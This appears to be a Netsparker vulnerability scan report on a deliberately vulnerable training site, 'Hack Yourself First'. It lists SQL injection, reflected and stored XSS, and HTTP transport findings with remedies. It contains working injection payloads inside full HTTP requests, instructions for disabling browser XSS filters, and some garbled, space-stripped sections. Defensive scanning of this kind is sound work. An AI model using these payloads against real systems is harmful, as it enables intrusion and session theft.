Please upgrade your installation of Microsoft SQL Server to the latest stable version.
Classification
OWASP 2010-A6, OWASP 2013-A9, PCI V2.0-6.1, PCI V3.0-6.1, CAPEC-310
7.1 Make/1
http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Identified Version: 11.0.9222.17
Latest Version: 12.0.2000
Vulnerability Database: Result is based on 18/08/2014 vulnerability database content.
Certainty:
Request
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:55 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
@media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; } }
@media screen and (max-width: 479px) { pre { width: 280px; } }
</style></head>
<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please revie…
1 TOTAL | MEDIUM | CONFIRMED: 1
8. Critical Form Served over HTTP
Netsparker detected that a critical form is served over HTTP.
Impact
If an attacker can carry out a man-in-the-middle attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing the action of the HTTP code to steal the user's password. Even though the target page is HTTPS, this does not protect the system against man-in-the-middle attacks.
This issue is important as it negates the use of SSL as a privacy protection barrier.
Actions to Take
1. See the remedy for solution.
2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.
Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
Classification
OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
8.1 Account/Login (CONFIRMED)
http://hackyourselffirst.troyhunt.com/Account/Login
Form target action
https://hackyourselffirst.troyhunt.com/Account/Login
Request
GET /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2549
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Log in - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet">
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li><…
3 TOTAL | MEDIUM
9. [Possible] Cross-site Scripting
Netsparker detected possible cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Although Netsparker believes there is a cross-site scripting in here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hijacking user's active session
- Changing the look of the page within the victim's browser
- Mounting a successful phishing attack
- Intercepting data and performing man-in-the-middle attacks
Remedy
This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered/encoded. Output should be filtered/encoded according to the output format and location.
There are a number of pre-defined, well structured whitelist libraries available for many different environments. Good examples of these include OWASP Reform and Microsoft Anti-cross-site scripting libraries.
Remedy References
- [ASP.NET] - Microsoft Anti-XSS Library
- OWASP XSS Prevention Cheat Sheet
External References
- XSS Cheat Sheet
- OWASP - cross-site scripting
- XSS Shell
- XSS Tunnelling
Classification
OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
9.1 api/vote
http://hackyourselffirst.troyhunt.com/api/vote
Parameters
Parameter | Type | Value
userId | POST | 1
supercarId | POST | 3
comments | POST | '"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>
Notes
Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing, such as Internet Explorer.
Certainty:
Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 90
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments='"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>
Response
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:47 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2985
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.",
"ExceptionMessage":"Unclosed quotation mark after the character string '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>')'.\r\nIncorrect syntax near '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>')'.",
"ExceptionType":"System.Data.SqlClient.SqlException",
"StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n
   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n
   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)\r\n
   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)\r\n
   at System.Data.SqlClient.SqlCommand.RunExecuteNonQueryTds(String methodName, Boolean async, Int32 timeout, Boolean asyncWrite)\r\n
   at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(TaskCompletionSource`1 completion, String methodName, Boolean sendToPipe, Int32 timeout, Boolean asyncWrite)\r\n
   at System.Data.SqlClient.SqlCommand.ExecuteNonQuery()\r\n
   at Web.Controllers.VoteController.Post(Vote vote)\r\n
   at lambda_method(Closure , Object , Object[] )\r\n
   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.<>c__DisplayClass10.<GetExecutor>b__9(Object instance, Object[] methodParameters)\r\n
   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.Execute(Object instanc…
9.2 api/admin
http://hackyourselffirst.troyhunt.com/api/admin?nsextt='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt
Parameters
Parameter | Type | Value
nsextt | GET | '"--></style></scRipt><scRipt>netsparker(0x0002E0)</scRipt>
Notes
Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing, such as Internet Explorer.
Certainty:
Request
GET /api/admin?nsextt='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x0002E0)%3C/scRipt%3E HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
15 57
1 TOTALIMPORTANT
CONFIRMED
1
3 Cross-site ScriptingNetsparkerdetectedcross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScript VBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofcross-sitescriptingincluding
HijackingusersactivesessionMountingphishingattacksInterceptingdataandperformingman-in-the-middleattacks
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisoutputshouldbeencodedaccordingtotheoutputlocationandcontextForexampleiftheoutputgoesintoaJavaScriptblockwithintheHTMLdocumentthenoutputneedstobeencodedaccordinglyEncodingcangetverycomplexthereforeitsstronglyrecommendedtouseanencodinglibrarysuchasOWASPESAPIandMicrosoftAnti-cross-sitescripting
Remedy ReferencesMicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
Proof of Concept NotesGeneratedXSSexploitmightnotworkduetobrowserXSSfilteringPleasefollowtheguidelinesbelowinordertodisableXSSfilteringfordifferentbrowsersAlsonotethat
XSSfilteringisafeaturethatsenabledbydefaultinsomeofthemodernbrowsersItshouldonlybedisabledtemporarilytotestexploitsandshouldberevertedbackifthebrowserisactivelyusedotherthantestingpurposesEventhoughbrowsershavecertaincheckstopreventCross-sitescriptingattacksinpracticethereareavarietyofwaystobypassthismechanismthereforeawebapplicationshouldnotrelyonthiskindofclient-sidebrowserchecks
Chrome
OpencommandpromptGotofolderwherechromeexeislocatedRunthecommandchromeexe --args --disable-xss-auditor
InternetExplorer
ClickTools-gtInternetOptionsandthennavigatetotheSecurityTabClickCustomlevelandscrolltowardsthebottomwhereyouwillfindthatEnableXSSfilteriscurrentlyEnabledSetittodisabledClickOKClickYestoacceptthewarningfollowedbyApply
Firefox
GotoaboutconfigintheURLaddressbarInthesearchfieldtypeurlbarfilterandfindbrowserurlbarfilterjavascriptSetitsvaluetofalsebydoubleclickingtherow
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
16 57
3.1 /Search (CONFIRMED)
http://hackyourselffirst.troyhunt.com/Search?searchTerm=%2Bnetsparker(9)%2B

Parameters
Parameter    Type   Value
searchTerm   GET    +netsparker(9)+

Request
GET /Search?searchTerm=%2Bnetsparker(9)%2B HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response
…</section></div></div></div></div></header>
<div class="container"><section>
<h2>You searched for &quot;<span id="searchTerm">+netsparker(9)+</span>&quot;</h2>
<p class="alert alert-error">No results found for your search</p>
</section><hr/><footer><p>&copy; 2014 - Hack Yourself First</p></footer>
…></script>
<script>$('#results tr').click(function () { var url = '/Supercar/' + $(this).attr('id'); window.location.href = url; });
$('#searchTerm').val('+netsparker(9)+');</script>
<script>(function (i, s, o, g, r, a, m) { i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () { (i[r].q = i[r].q || []).push(arguments) }, i[r…
4 Permanent Cross-site Scripting
IMPORTANT - 1 total, 1 confirmed

Netsparker identified permanent cross-site scripting and confirmed this vulnerability by analyzing the execution of injected JavaScript.

Permanent XSS allows an attacker to execute dynamic scripts (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by the user has been interpreted as HTML/JavaScript/VBScript within the browser.

Permanent means that the attack will be stored in the backend system. In normal XSS attacks an attacker needs to e-mail the victim, but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' sessions, the attacker might attack an administrator to gain full control over the application.

Impact
Permanent XSS is a dangerous issue that has many exploitation vectors, some of which include:
- Users' session-sensitive information, such as cookies, can be stolen.
- XSS can enable client-side worms which could modify, delete or steal other users' data within the application.
- The website can be redirected to a new location, defaced or used as a phishing site.

Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a whitelist. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well-structured whitelist libraries available for many different environments; good examples of these include the OWASP Reform and Microsoft Anti-cross-site scripting libraries.

Remedy References
[ASP.NET] - Microsoft Anti-XSS Library
OWASP XSS Prevention Cheat Sheet
OWASP AntiSamy Java

External References
XSS Cheat Sheet
OWASP - Cross-site Scripting
XSS Shell
XSS Tunnelling

Classification: OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
4.1 /Supercar/3 (CONFIRMED)
http://hackyourselffirst.troyhunt.com/Supercar/3

Injection URL
http://hackyourselffirst.troyhunt.com/api/vote
Injection Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 77
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%22%3e%3cnet+sparker%3dnetsparker(0x00043F)%3e

Identification Request
GET /Supercar/3 HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Injection Response
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:53 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1

Identification Response
…1)) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)),1,1)),0)=1</td></tr><tr><td>Troy Hunt</td><td>"><net sparker="netsparker(0x00043F)"></td></tr><tr><td>Troy Hunt</td><td>-1 OR 1=1) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)…
5 Password Transmitted over HTTP
IMPORTANT - 1 total, 1 confirmed

Netsparker detected that password data is being transmitted over HTTP.

Impact
If an attacker can intercept network traffic, he/she can steal users' credentials.

Actions to Take
1. See the remedy for solution.
2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.

Classification: OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
5.1 /Account/Register (CONFIRMED)
http://hackyourselffirst.troyhunt.com/Account/Register

Form target action
http://hackyourselffirst.troyhunt.com/Account/Register

Request
GET /Account/Register HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2265
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Register - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet">
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
6 Cookie Not Marked as Secure
IMPORTANT - 1 total, 1 confirmed

Netsparker identified a cookie not marked as secure and transmitted over HTTPS.

This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful man-in-the-middle attack.

Impact
This cookie will be transmitted over a HTTP connection; therefore, if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request to steal the cookie.

Actions to Take
1. See the remedy for solution.
2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)

Remedy
Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation
To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to understand layer 2, have physical access to systems either as waypoints for the traffic, or have locally gained access to a system between the victim and the web server.

External References
.NET Cookie.Secure Property
How to Create Totally Secure Cookies

Classification: OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-614, CAPEC-102, WASC-15
6.1 /Account/Login (CONFIRMED)
https://hackyourselffirst.troyhunt.com/Account/Login

